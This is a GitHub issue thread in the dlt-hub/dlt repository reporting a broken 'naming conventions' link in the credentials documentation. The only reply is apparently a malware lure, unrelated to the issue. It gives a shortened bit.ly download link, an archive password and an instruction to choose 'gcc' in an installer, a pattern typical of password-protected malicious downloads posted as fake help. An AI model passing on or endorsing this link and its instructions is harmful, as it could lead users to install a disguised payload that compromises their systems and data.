### ISSUE TITLE
Broken link in documentation: naming conventions

### ISSUE THREAD

**Issue by boxydog** [dlt-hub/dlt#1752]
### Documentation description

https://dlthub.com/docs/general-usage/credentials/setup/#credential-types has this sentence:

> dlt automatically extracts configuration settings and secrets based on flexible [naming conventions](https://dlthub.com/docs/general-usage/credentials/setup/setup/#naming-convention).

That link is broken.

### Are you a dlt user?

Yes, I'm already a dlt user.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
